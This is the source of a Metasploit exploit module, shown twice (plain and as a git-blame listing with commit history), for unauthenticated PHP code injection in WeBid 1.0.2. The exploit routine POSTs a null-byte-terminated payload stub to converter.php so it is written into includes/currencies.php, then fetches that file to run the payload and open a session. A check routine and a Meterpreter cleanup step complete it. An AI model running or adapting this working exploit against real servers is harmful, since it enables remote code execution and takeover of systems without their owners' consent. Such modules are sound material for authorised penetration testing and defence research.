modules/exploits/linux/http/webid_converter.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WeBid converter.php Remote PHP Code Injection',
        'Description' => %q{
          This module exploits a vulnerability found in WeBid version 1.0.2.
          By abusing the converter.php file, a malicious user can inject PHP code
          in the includes/currencies.php script without any authentication, which
          results in arbitrary code execution.
        },
        'Author' => [
          'EgiX', # Vulnerability Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '73609' ],
          [ 'EDB', '17487' ],
          [ 'URL', 'http://www.webidsupport.com/forums/showthread.php?3892' ]
        ],
        'Privileged' => false,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Payload' => {
        },
        'DisclosureDate' => '2011-07-05',
        'Targets' => [
          [ 'WeBid 1.0.2 / Ubuntu', {} ]
        ],
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              core_channel_eof
              core_channel_open
              core_channel_read
              core_channel_write
              stdapi_fs_delete_file
              stdapi_fs_getwd
              stdapi_fs_search
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to WeBid', '/WeBid'])
      ], self.class
    )

    self.needs_cleanup = true
  end

  def check
    uri = target_uri.path
    uri << '/' if uri[-1, 1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, "docs/changes.txt")
    })

    if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/
      return Exploit::CheckCode::Appears
    end

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => uri + "converter.php"
    })

    if res and res.code == 200 and res.body =~ /WeBId.*CURRENCY CONVERTER/
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  def on_new_session(client)
    peer = "#{client.peerhost}:#{client.peerport}"

    if client.type != "meterpreter"
      print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
      print_error("The currencies.php won't be restored automatically.")
      return
    end

    # stdapi must be loaded before we can use fs.file
    client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

    # Original currencies.php file
    currencies_php = <<-eof
      <?php
      $conversionarray[] = '1265375103';
      $conversionarray[] = array(
        array('from' => 'GBP', 'to' => 'AED', 'rate' => '')
      );
      ?>
    eof
    currencies_php = currencies_php.gsub(/^ {6}/, '')

    pwd = client.fs.dir.pwd
    print_status("Searching currencies.php file from #{pwd}")

    res = client.fs.file.search(nil, "currencies.php", true, -1)
    res.each do |hit|
      filename = "#{hit['path']}/#{hit['name']}"
      print_warning("Restoring #{filename}")
      client.fs.file.rm(filename)
      fd = client.fs.file.new(filename, "wb")
      fd.write(currencies_php)
      fd.close
    end

    print_status("Cleanup finished")
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1, 1] != '/'
    peer = "#{rhost}:#{rport}"

    stub = "\0'));#{payload.encoded}?>"

    print_status("Injecting the PHP payload")

    response = send_request_cgi({
      'uri' => normalize_uri(uri, "converter.php"),
      'method' => "POST",
      'vars_post' => {
        "action" => "convert",
        "from" => "USD",
        "to" => stub
      }
    })

    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
      return
    end

    print_status("Executing the PHP payload")

    timeout = 0.01
    response = send_request_cgi({
      'uri' => normalize_uri(uri, "includes/currencies.php"),
      'method' => "GET",
      'headers' => {
        'Connection' => "close",
      }
    }, timeout)

    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`Rank = ExcellentRanking`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`include Msf::Exploit::Remote::HttpClient`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`def initialize(info = {})`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'WeBid converter.php Remote PHP Code Injection',`
			`'Description' => %q{`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`This module exploits a vulnerability found in WeBid version 1.0.2.`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`By abusing the converter.php file, a malicious user can inject PHP code`
			`in the includes/currencies.php script without any authentication, which`
			`results in arbitrary code execution.`
			`},`
			`'Author' => [`
			`'EgiX', # Vulnerability Discovery, PoC`
			`'juan vazquez' # Metasploit module`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' => [`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '73609' ],`
Update references 2012-12-10 11:42:21 -06:00			`[ 'EDB', '17487' ],`
			`[ 'URL', 'http://www.webidsupport.com/forums/showthread.php?3892' ]`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`],`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'Privileged' => false,`
			`'Platform' => ['php'],`
			`'Arch' => ARCH_PHP,`
			`'Payload' => {`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`},`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'DisclosureDate' => '2011-07-05',`
			`'Targets' => [`
target info plus relocation 2012-05-25 20:16:13 +02:00			`[ 'WeBid 1.0.2 / Ubuntu', {} ]`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`],`
Add Meterpreter compatibility metadata 2021-10-06 13:43:31 +01:00			`'DefaultTarget' => 0,`
			`'Compat' => {`
			`'Meterpreter' => {`
			`'Commands' => %w[`
			`core_channel_eof`
			`core_channel_open`
			`core_channel_read`
			`core_channel_write`
			`stdapi_fs_delete_file`
			`stdapi_fs_getwd`
			`stdapi_fs_search`
			`]`
			`}`
			`}`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`)`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`)`

			`register_options(`
			`[`
			`OptString.new('TARGETURI', [true, 'The base path to WeBid', '/WeBid'])`
			`], self.class`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`self.needs_cleanup = true`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`def check`
Correctly use normalize_uri() 2013-01-30 23:23:41 -06:00			`uri = target_uri.path`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`uri << '/' if uri[-1, 1] != '/'`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`res = send_request_cgi({`
			`'method' => 'GET',`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'uri' => normalize_uri(uri, "docs/changes.txt")`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`})`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/`
			`return Exploit::CheckCode::Appears`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`res = send_request_cgi({`
			`'method' => 'GET',`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'uri' => uri + "converter.php"`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`})`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`if res and res.code == 200 and res.body =~ /WeBId.*CURRENCY CONVERTER/`
			`return Exploit::CheckCode::Detected`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`return Exploit::CheckCode::Safe`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`def on_new_session(client)`
Print target IP/Port when restoring currencies.php 2012-05-28 01:33:45 -05:00			`peer = "#{client.peerhost}:#{client.peerport}"`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`if client.type != "meterpreter"`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")`
			`print_error("The currencies.php won't be restored automatically.")`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`# stdapi must be loaded before we can use fs.file`
			`client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`# Original currencies.php file`
			`currencies_php = <<-eof`
			`<?php`
			`$conversionarray[] = '1265375103';`
			`$conversionarray[] = array(`
			`array('from' => 'GBP', 'to' => 'AED', 'rate' => '')`
			`);`
			`?>`
			`eof`
Make gsubs compliant with the new indentation standard 2013-12-31 11:06:53 -06:00			`currencies_php = currencies_php.gsub(/^ {6}/, '')`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`pwd = client.fs.dir.pwd`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Searching currencies.php file from #{pwd}")`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`res = client.fs.file.search(nil, "currencies.php", true, -1)`
			`res.each do \|hit\|`
			`filename = "#{hit['path']}/#{hit['name']}"`
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_warning("Restoring #{filename}")`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`client.fs.file.rm(filename)`
			`fd = client.fs.file.new(filename, "wb")`
			`fd.write(currencies_php)`
			`fd.close`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Cleanup finished")`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`def exploit`
Correctly use normalize_uri() 2013-01-30 23:23:41 -06:00			`uri = target_uri.path`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`uri << '/' if uri[-1, 1] != '/'`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`peer = "#{rhost}:#{rport}"`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`stub = "\0'));#{payload.encoded}?>"`
Retab modules 2013-08-30 16:28:54 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Injecting the PHP payload")`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`response = send_request_cgi({`
Correctly use normalize_uri() 2013-01-30 23:23:41 -06:00			`'uri' => normalize_uri(uri, "converter.php"),`
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`'method' => "POST",`
			`'vars_post' => {`
			`"action" => "convert",`
			`"from" => "USD",`
			`"to" => stub`
			`}`
			`})`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`if response and response.code != 200`
			`print_error("Server returned non-200 status code (#{response.code})")`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Remove now-redundant peer 2016-02-01 15:12:03 -06:00			`print_status("Executing the PHP payload")`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`timeout = 0.01`
			`response = send_request_cgi({`
Run Rubocop layout rules on modules 2021-09-10 12:53:39 +01:00			`'uri' => normalize_uri(uri, "includes/currencies.php"),`
			`'method' => "GET",`
			`'headers' => {`
			`'Connection' => "close",`
			`}`
			`}, timeout)`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`if response and response.code != 200`
			`print_error("Server returned non-200 status code (#{response.code})")`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
module added for OSVDB-73609 2012-05-25 17:18:09 +02:00			`handler`
			`end`
			`end`